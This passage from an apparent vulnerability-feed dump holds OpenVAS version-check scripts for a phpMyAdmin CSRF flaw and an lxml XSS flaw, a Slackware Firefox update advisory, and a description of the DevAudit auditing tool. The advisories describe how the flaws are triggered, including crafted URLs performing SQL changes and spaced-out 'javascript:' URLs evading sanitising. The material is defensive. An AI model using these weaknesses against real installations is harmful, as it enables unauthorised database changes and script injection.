);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-12T13:36:32", "references": ["https://www.phpmyadmin.net/security/PMASA-2018-7/"], "pluginID": "1361412562310108515", "description": "phpMyAdmin is prone to an Cross-Site Scripting (XSS) and\n Cross-Site Request Forgery (CSRF) Vulnerability.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-12-12T00:00:00", "title": "phpMyAdmin 4.7.0 <= 4.7.6, 4.8.0 <= 4.8.3 XSRF/CSRF Vulnerability - PMASA-2018-7 (Linux)", "type": "openvas", "enchantments": {}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-19969"], "modified": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310108515", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108515", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_xss_vuln_PMASA-2018-7_lin.nasl 12764 2018-12-12 07:44:24Z cfischer $\n#\n# phpMyAdmin 4.7.0 <= 4.7.6, 4.8.0 <= 4.8.3 XSRF/CSRF Vulnerability - PMASA-2018-7 (Linux)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108515\");\n script_version(\"$Revision: 12764 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-12 08:44:24 +0100 (Wed, 12 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 07:54:53 +0100 (Wed, 12 Dec 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2018-19969\");\n script_name(\"phpMyAdmin 4.7.0 <= 4.7.6, 4.8.0 <= 4.8.3 XSRF/CSRF Vulnerability - PMASA-2018-7 (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2018-7/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to an Cross-Site Scripting (XSS) and\n Cross-Site Request Forgery (CSRF) Vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"By deceiving a user to click on a crafted URL, it is possible to\n perform harmful SQL operations such as renaming databases, creating new tables/routines, deleting\n designer pages, adding/deleting users, updating user passwords, killing SQL processes, etc.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin versions 4.7.0 through 4.7.6 and 4.8.0 through 4.8.3.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.8.4.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif( version_in_range( version:vers, test_version:\"4.7.0\", test_version2:\"4.7.6\" ) ||\n version_in_range( version:vers, test_version:\"4.8.0\", test_version2:\"4.8.3\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.8.4\", install_path:path );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-11T15:37:50", "references": ["https://lists.debian.org/debian-lts-announce/2018/12/msg00001.html"], "pluginID": "1361412562310891604", "description": "It was discovered that there was a XSS injection vulnerability in\nthe LXML HTML/XSS manipulation library for Python.\n\nLXML did not remove ", "edition": 1, "reporter": "Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net", "published": "2018-12-11T00:00:00", "title": "Debian LTS Advisory ([SECURITY] [DLA 1604-1] lxml security update)", "type": "openvas", "enchantments": {}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-19787", "CVE-2014-3146"], "modified": "2018-12-11T00:00:00", "id": "OPENVAS:1361412562310891604", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891604", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1604.nasl 12750 2018-12-11 07:34:39Z cfischer $\n#\n# Auto-generated from advisory DLA 1604-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891604\");\n script_version(\"$Revision: 12750 $\");\n script_cve_id(\"CVE-2018-19787\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1604-1] lxml security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-11 08:34:39 +0100 (Tue, 11 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-11 00:00:00 +0100 (Tue, 11 Dec 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/12/msg00001.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\\.[0-9]+\");\n script_tag(name:\"affected\", value:\"lxml on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this issue has been fixed in lxml version\n3.4.0-1+deb8u1.\n\nWe recommend that you upgrade your lxml packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that there was a XSS injection vulnerability in\nthe LXML HTML/XSS manipulation library for Python.\n\nLXML did not remove 'javascript:' URLs that used escaping such as\n'j a v a s c r i p t'. This is a similar issue to CVE-2014-3146.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"python-lxml\", ver:\"3.4.0-1+deb8u1\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-lxml-dbg\", ver:\"3.4.0-1+deb8u1\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-lxml-doc\", ver:\"3.4.0-1+deb8u1\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python3-lxml\", ver:\"3.4.0-1+deb8u1\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python3-lxml-dbg\", ver:\"3.4.0-1+deb8u1\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "slackware": [{"lastseen": "2018-12-12T09:07:37", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "60.4.0esr", "arch": "i686", "packageFilename": "mozilla-firefox-60.4.0esr-i686-1_slack14.2.txz", "packageName": "mozilla-firefox", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.2", "packageVersion": "60.4.0esr", "arch": "x86_64", "packageFilename": "mozilla-firefox-60.4.0esr-x86_64-1_slack14.2.txz", "packageName": "mozilla-firefox", "operator": "lt"}], "description": "New mozilla-firefox packages are available for Slackware 14.2 and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/mozilla-firefox-60.4.0esr-i686-1_slack14.2.txz: Upgraded.\n This release contains security fixes and improvements.\n For more information, see:\n https://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html\n https://www.mozilla.org/en-US/security/advisories/mfsa2018-30/\n https://www.mozilla.org/en-US/security/advisories/mfsa2018-30/#CVE-2018-17466\n https://www.mozilla.org/en-US/security/advisories/mfsa2018-30/#CVE-2018-18492\n https://www.mozilla.org/en-US/security/advisories/mfsa2018-30/#CVE-2018-18493\n https://www.mozilla.org/en-US/security/advisories/mfsa2018-30/#CVE-2018-18494\n https://www.mozilla.org/en-US/security/advisories/mfsa2018-30/#CVE-2018-18498\n https://www.mozilla.org/en-US/security/advisories/mfsa2018-30/#CVE-2018-12405\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mozilla-firefox-60.4.0esr-i686-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mozilla-firefox-60.4.0esr-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-60.4.0esr-i686-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-60.4.0esr-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.2 package:\n01fc1f59b80c29dbb901552d8b0ec41b mozilla-firefox-60.4.0esr-i686-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n17521ad9bda9ac063c1bf9996e08bc48 mozilla-firefox-60.4.0esr-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n8bcc85863ba42906f71d9e63927df710 xap/mozilla-firefox-60.4.0esr-i686-1.txz\n\nSlackware x86_64 -current package:\nacde0468c7113e753c03cc26818cd5b1 xap/mozilla-firefox-60.4.0esr-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg mozilla-firefox-60.4.0esr-i686-1_slack14.2.txz", "edition": 1, "reporter": "Slackware Linux Project", "published": "2018-12-11T20:59:01", "title": "mozilla-firefox", "type": "slackware", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-18492", "CVE-2018-18494", "CVE-2018-17466", "CVE-2018-12405", "CVE-2018-18498", "CVE-2018-18493"], "modified": "2018-12-11T20:59:01", "id": "SSA-2018-345-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.401034", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2018-12-11T16:34:31", "references": ["https://conemu.github.io/", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Interoperability%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Design.Generic%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Performance%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Design.Linq%28git%29", "https://github.com/OSSIndex/DevAudit/issues/78", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Interoperability.Com%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.NUnit%28git%29", "https://camo.githubusercontent.com/b6949bbe03ce1c80a2e5c00777469daa862f563f/68747470733a2f2f6c68332e676f6f676c6575736572636f6e74656e742e636f6d2f696434494245663235756776536a5a4f7846374b56593843446f574c4e6c626235647948513852367761627446704d6a7772566c5f45494a4e6e6f506f627a6f3255434a6a357667684f61633870684a32554b4c636971436c6a4231696f5551363832645254674f594f676b664c425a4c7278564d326c6348474a5837776e517079717957773d773930302d683435302d6e6f", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Concurrency%28git%29", "https://camo.githubusercontent.com/32adc2744197fd740bd0235742831236717d379a/68747470733a2f2f6c68332e676f6f676c6575736572636f6e74656e742e636f6d2f57694d432d656e323559494f47356c577a506a68463644396c33575477354764595f6e652d4c6a706251634f636157677a6732626553336651633159724356626c6d506f353951495a4d6d576b393873754a6a45475f43476543316741456650715a624f55626d35396962547766757876744853722d64774e6b70384e4d7a6c3750594848673d77313430322d683831352d6e6f", "https://github.com/allisterb/Alpheus", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Exceptions%28git%29", "https://github.com/OSSIndex/DevAudit/releases", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Correctness%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Globalization%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Security.Cas%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Ui%28git%29", "https://github.com/OSSIndex/DevAudit", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Gendarme%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Naming%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.BadPractice%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Design%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Maintainability%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Portability%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Smells%28git%29", "https://github.com/OSSIndex/DevAudit.git", "https://github.com/dnnsoftware/Dnn.Platform/", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Serialization%28git%29", "https://github.com/spouliot/gendarme/wiki/Gendarme.Rules.Security%28git%29"], "description": "[  ](<https://3.bp.blogspot.com/-ncUdrwzRnj0/XAW1hKnVsEI/AAAAAAAANec/V6P88XH9gnIxozZ7mhcjWVh43J8U6l57gCLcBGAs/s1600/DevAudit_1.png>)\n\n \n\n\nDevAudit is an open-source, cross-platform, multi-purpose security auditing tool targeted at developers and teams adopting DevOps and DevSecOps that detects security [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities>) at multiple levels of the solution stack. DevAudit provides a wide array of auditing capabilities that automate security practices and implementation of security auditing in the software development life-cycle. DevAudit can scan your operating system and application package dependencies, application and application server configurations, and application code, for potential vulnerabilities based on data aggregated by providers like [ OSS Index ](<https://ossindex.net/>) and [ Vulners ](<https://vulners.com/>) from a wide array of sources and data feeds such as the National [ Vulnerability ](<https://www.kitploit.com/search/label/Vulnerability>) Database (NVD) CVE data feed, the Debian Security Advisories data feed, Drupal Security Advisories, and many others. \n\n \n\n\nDevAudit helps developers address at least 4 of the [ OWASP Top 10 ](<https://www.owasp.org/index.php/Top_10_2013>) risks to web application development: \n\n * [ A9 Using Components with Known Vulnerabilities ](<https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities>)\n * [ A5 Security Misconfiguration ](<https://www.owasp.org/index.php/Top_10_2013-A5-Security_Misconfiguration>)\n * [ A6 Sensitive Data Exposure ](<https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure>)\n * [ A2 Broken Authentication and Session Management ](<https://www.owasp.org/index.php/Top_10_2013-A2-Broken_Authentication_and_Session_Management>)\nas well as risks classified by MITRE in the CWE dictionary such as [ CWE-2 Environment ](<https://cwe.mitre.org/data/definitions/2.html>) and [ CWE-200 Information Disclosure ](<https://cwe.mitre.org/data/definitions/200.html>) \n \n\n\n[  ](<https://1.bp.blogspot.com/-jF8EVqav_18/XAXMJP3lUzI/AAAAAAAANeo/twiZudDoLOEzxsF5KzSMNSzuGMyd6mg9ACLcBGAs/s1600/DevAudit_4.png>)\n\n \n[ ](<https://camo.githubusercontent.com/32adc2744197fd740bd0235742831236717d379a/68747470733a2f2f6c68332e676f6f676c6575736572636f6e74656e742e636f6d2f57694d432d656e323559494f47356c577a506a68463644396c33575477354764595f6e652d4c6a706251634f636157677a6732626553336651633159724356626c6d506f353951495a4d6d576b393873754a6a45475f43476543316741456650715a624f55626d35396962547766757876744853722d64774e6b70384e4d7a6c3750594848673d77313430322d683831352d6e6f>) As development progresses and its capabilities mature, DevAudit will be able to address the other risks on the OWASP Top 10 and CWE lists like Injection and XSS. With the focus on web and cloud and distributed multi-user applications, software development today is increasingly a complex affair with security issues and potential vulnerabilities arising at all levels of the stack developers rely on to deliver applications. The goal of DevAudit is to provide a platform for automating implementation of development security reviews and best practices at all levels of the solution stack from library package dependencies to application and server configuration to source code. \n \n** Features ** \n\n\n * ** Cross-platform with a Docker image also available. ** DevAudit runs on Windows and Linux with *BSD and Mac and ARM Linux support planned. Only an up-to-date version of .NET or Mono is required to run DevAudit. A [ DevAudit Docker image ](<https://hub.docker.com/r/ossindex/devaudit/>) can also be pulled from Docker Hub and run without the need to install Mono. \n\n * ** CLI interface. ** DevAudit has a CLI interface with an option for non-interactive output and can be easily integrated into CI build pipelines or as post-build command-line tasks in developer IDEs. Work on integration of the core audit library into IDE GUIs has already begun with the [ Audit.Net ](<https://visualstudiogallery.msdn.microsoft.com/73493090-b219-452a-989e-e3d228023927?SRC=Home>) Visual Studio extension. \n\n * ** Continuously updated vulnerabilties data ** . DevAudit uses backend data providers like [ OSS Index ](<https://ossindex.net/>) and [ Vulners ](<https://vulners.com/#stats>) which provide continuously updated vulnerabilities data compiled from a [ wide range ](<https://vulners.com/stats>) of security data feeds and sources such as the NVD CVE feeds, Drupal Security Advisories, and so on. Support for additional vulnerability and package data providers like [ vFeed ](<https://vfeed.io/>) and [ Libraries.io ](<https://libraries.io/>) will be added. \n\n * ** Audit operating system and development package dependencies. ** DevAudit audits Windows applications and packages installed via Windows MSI, Chocolatey, and OneGet, as well as Debian, Ubuntu, and CentOS Linux packages installed via Dpkg, RPM and YUM, for vulnerabilities reported for specific versions of the applications and packages. For development package dependencies and libraries DevAudit audits NuGet v2 dependencies for .NET, Yarn/NPM and Bower dependencies for nodejs, and Composer package dependencies for PHP. Support for other package managers for different languages is added regularly. \n\n * ** Audit application server configurations ** . DevAudit audits the server version and the server configuration for the OpenSSH sshd, Apache httpd, MySQL/MariaDB, PostgreSQL, and Nginx servers with many more coming. Configuration auditing is based on the [ Alpheus ](<https://github.com/allisterb/Alpheus>) library and is done using full syntactic analysis of the server configuration files. Server configuration rules are stored in YAML text files and can be customized to the needs of developers. Support for many more servers and applications and types of analysis like database auditing is added regularly. \n\n * ** Audit application configurations ** . DevAudit audits Microsoft ASP.NET applications and detects vulnerabilities present in the application configuration. Application configuration rules are stored in YAML text files and can be customized to the needs of developers. Application configuration auditing for applications like Drupal and WordPress and DNN CMS is coming. \n\n * ** Audit application code by static analysis ** . DevAudit currently supports [ static analysis ](<https://www.kitploit.com/search/label/Static%20Analysis>) of .NET CIL bytecode. Analyzers reside in external script files and can be fully customized based on the needs of the developer. Support for C# source [ code analysis ](<https://www.kitploit.com/search/label/Code%20Analysis>) via Roslyn, PHP7 source code and many more languages and external static code analysis tools is coming. \n\n * ** Remote agentless auditing ** . DevAudit can connect to remote hosts via SSH with identical auditing features available in remote environments as in local environments. Only a valid SSH login is required to audit remote hosts and DevAudit running on Windows can connect to and audit Linux hosts over SSH. On Windows DevAudit can also remotely connect to and audit other Windows machines using WinRM. \n\n * ** Agentless Docker container auditing ** . DevAudit can audit running Docker containers from the Docker host with identical features available in container environments as in local environments. \n\n * ** GitHub repository auditing ** . DevAudit can connect directly to a project repository hosted on GitHub and perform package source and application configuration auditing. \n\n * ** PowerShell support ** . DevAudit can also be run inside the PowerShell system administration environment as cmdlets. Work on PowerShell support is paused at present but will resume in the near future with support for cross-platform Powershell both on Windows and Linux. \n\n \n** Requirements ** \nDevAudit is a .NET 4.6 application. To install locally on your machine you will need either the Microsoft .NET Framework 4.6 runtime on Windows, or Mono 4.4+ on Linux. .NET 4.6 should be already installed on most recent versions of Windows, if not then it is available as a Windows feature that can be turned on or installed from the Programs and Features control panel applet on consumer Windows, or from the Add Roles and Features option in Server Manager on server versions of Windows. For older versions of Windows, the .NET 4.6 installer from Microsoft can be found [ here ](<https://www.microsoft.com/en-us/download/details.aspx?id=48130>) . \nOn Linux the minimum version of Mono supported is 4.4. Although DevAudit runs on Mono 4 ( [ with one known issue ](<https://github.com/OSSIndex/DevAudit/issues/78>) ) it's recommended that Mono 5 be installed. Mono 5 brings many [ improvements ](<http://www.mono-project.com/news/2017/05/15/mono-5-0-is-out/>) to the build and runtime components of Mono that benefit DevAudit. \nThe existing Mono packages provided by your distro are probably not Mono 5 as yet, so you will have to install Mono packages manually to be able to use Mono 5. Installation instructions for the most recent packages provided by the Mono project for several major Linux distros are [ here ](<http://www.mono-project.com/docs/getting-started/install/linux/>) . It is recommended you have the mono-devel package installed as this will reduce the chances of missing assemblies. \nAlternatively on Linux you can use the DevAudit Docker image if you do not wish to install Mono and already have Docker installed on your machine. \n \n** Installation ** \nDevAudit can be installed by the following methods: \n\n\n * Building from source. \n * Using a binary release archive file downloaded from Github for Windows or Linux. \n * Using the release MSI installer downloaded from Github for Windows. \n * Using the Chocolatey package manager on Windows. \n * Pulling the ossindex/devaudit image from Docker Hub on Linux. \n \n** Building from source on Linux ** \n\n\n 1. Pre-requisites: Mono 4.4+ (Mono 5 recommended) and the mono-devel package which provides the compiler and other tools needed for building Mono apps. Your distro should have packages for at least Mono version 4.4 and above, otherwise manual installation instructions for the most recent packages provided by the Mono project for several major Linux distros are [ here ](<http://www.mono-project.com/docs/getting-started/install/linux/>) \n\n 2. Clone the DevAudit repository from [ https://github.com/OSSIndex/DevAudit.git ](<https://github.com/OSSIndex/DevAudit.git>) \n\n 3. Run the ` build.sh ` script in the root DevAudit directory. DevAudit should compile without any errors. \n\n 4. Run ` ./devaudit --help ` and you should see the DevAudit version and help screen printed. \n\nNote that NuGet on Linux may occasionally exit with ` Error: NameResolutionFailure ` which seems to be a transient problem contacting the servers that contain the NuGet packages. You should just run ./build.sh again until the build completes normally. \n \n** Building from source on Windows ** \n\n\n 1. Pre-requisites: You must have one of: \n\n * A [ .NET Framework 4.6 ](<http://getdotnet.azurewebsites.net/target-dotnet-platforms.html>) SDK or developer pack. \n * Visual Studio 2015. \n 2. Clone the DevAudit repository from [ https://github.com/OSSIndex/DevAudit.git ](<https://github.com/OSSIndex/DevAudit.git>) \n\n 3. From a visual Studio 2015 or ,NETRun the ` build.cmd ` script in the root DevAudit directory. DevAudit should compile without any errors. \n\n 4. Run ` ./devaudit --help ` and you should see the DevAudit version and help screen printed. \n\n \n** Installing from the release archive files on Windows on Linux ** \n\n\n 1. Pre-requisites: You must have Mono 4.4+ on Linux or .NET 4.6 on Windows. \n\n 2. Download the latest release archive file for Windows or Linux from the project [ releases ](<https://github.com/OSSIndex/DevAudit/releases>) page. Unpack this file to a directory. \n\n 3. From the directory where you unpacked the release archive run ` devaudit --help ` on Windows or ` ./devaudit --help ` on Linux. You should see the version and help screen printed. \n\n 4. (Optional) Add the DevAudit installation directory to your PATH environment variable \n\n \n** Installing using the MSI Installer on Windows ** \nThe MSI installer for a release can be found on the Github releases page. \n\n\n 1. Click on the [ releases ](<https://github.com/OSSIndex/DevAudit/releases>) link near the top of the page. \n 2. Identify the release you would like to install. \n 3. A \"DevAudit.exe\" link should be visible for each release that has a pre-built installer. \n 4. Download the file and execute the installer. You will be guided through a simple installation. \n 5. Open a _ new _ command prompt or PowerShell window in order to have DevAudit in path. \n 6. Run DevAudit. \n \n** Installing using Chocolatey on Windows ** \nDevAudit is also available on [ Chocolatey ](<https://chocolatey.org/packages/devaudit/2.0.0.40-beta>) . \n\n\n 1. Install [ Chocolatey ](<https://chocolatey.org/>) . \n 2. Open an admin console or PowerShell window. \n 3. Type ` choco install devaudit `\n 4. Run DevAudit. \n \n** Installing using Docker on Linux ** \nPull the Devaudit image from Docker Hub: ` docker pull ossindex/devaudit ` . The image tagged ` ossindex/devaudit:latest ` (which is the default image that is downloaded) is built from the most recent release while ` ossindex/devaudit:unstable ` is built on the master branch of the source code and contains the newest additions albeit with less testing. \n \n** Concepts ** \n \n** Audit Target ** \nRepresents a logical group of auditing functions. DevAudit currently supports the following audit targets: \n\n\n * ** Package Source ** . A package source manages application and library dependencies using a package manager. Package managers install, remove or update applications and library dependencies for an operating system like Debian Linux, or for a development language or framework like .NET or nodejs. Examples of package sources are dpkg, yum, Chocolatey, Composer, and Bower. DevAudit audits the names and versions of installed packages against vulnerabilities reported for specific versions of those packages. \n * ** Application ** . An application like Drupal or a custom application built using a framework like ASP.NET. DevAudit audits applications and application modules and plugins against vulnerabilities reported for specific versions of application binaries and modules and plugins. DevAudit can also audit application configurations for known vulnerabilities, and perform static analysis on application code looking for known weaknesses. \n * ** Application Server ** . Application servers provide continuously running services or daemons like a web or database server for other applications to use, or for users to access services like authentication. Examples of application servers are the OpenSSH sshd and Apache httpd servers. DevAudit can audit application server binaries, modules and plugins against vulnerabilities reported for specific versions as well as audit server configurations for known server configuration vulnerabilities and weaknesses. \n \n** Audit Environment ** \nRepresents a logical environment where audits against audit targets are executed. Audit environments abstract the I/O and command executions required for an audit and allow identical functions to be performed against audit targets on whatever physical or network location the target's files and executables are located. The follwing environments are currently supported : \n\n\n * ** Local ** . This is the default audit environment where audits are executed on the local machine. \n * ** SSH ** . Audits are executed on a remote host connected over SSH. It is not necessary to have DevAudit installed on the remote host. \n * ** WinRM ** . Audits are executed on a remote Windows host connected over WinRM. It is not necessary to have DevAudit installed on the remote host. \n * ** Docker ** . Audits are executed on a running Docker container. It is not necessary to have DevAudit installed on the container image. \n * ** GitHub ** . Audits are executed on a GitHub project repository's file-system directly. It is not necessary to checkout or download the project locally to perform the audit. \n \n** Audit Options ** \nThese are different options that can be enabled for the audit. You can specify options that apply to the DevAudit program for example, to run in non-interactive mode, as well as options that apply to the target e.g if you set the AppDevMode option for auditing ASP.NET applications to true then certain audit rules will not be enabled. \n \n** Basic Usage ** \nThe CLI is the primary interface to the DevAudit program and is suitable both for interactive use and for non-interactive use in scheduled tasks, shell scripts, CI build pipelines and post-build tasks in developer IDEs. The basic DevAudit CLI syntax is: \n\n \n \n devaudit TARGET [ENVIRONMENT] | [OPTIONS]\n\nwhere ` TARGET ` specifies the audit target ` ENVIRONMENT ` specifies the audit environment and ` OPTIONS ` specifies the options for the audit target and environment. There are 2 ways to specify options: program options and general audit options that apply to more than one target can be specified directly on the command-line as parameters . Target-specific options can be specified with the ` -o ` options using the format: ` -o OPTION1=VALUE1,OPTION2=VALUE2,.... ` with commas delimiting each option key-value pair. \nIf you are piping or redirecting the program output to a file then you should always use the ` -n --non-interactive ` option to disable any interactive user interface features and animations. \nWhen specifying file paths, an @ prefix before a path indicates to DevAudit that this path is relative to the root directory of the audit target e.g if you specify: ` -r c:\\myproject -b @bin\\Debug\\app2.exe ` DevAudit considers the path to the binary file as c:\\myproject\\bin\\Debug\\app2.exe. \n \n** Audit Targets ** \n \n** Package Sources ** \n\n\n * ` msi ` Do a package audit of the Windows Installer MSI package source on Windows machines. \n\n * ` choco ` Do a package audit of packages installed by the Choco package manager. \n\n * ` oneget ` Do a package audit of the system OneGet package source on Windows. \n\n * ` nuget ` Do a package audit of a NuGet v2 package source. You must specify the location of the NuGet ` packages.config ` file you wish to audit using the ` -f ` or ` --file ` option otherwise the current directory will be searched for this file. \n\n * ` bower ` Do a package audit 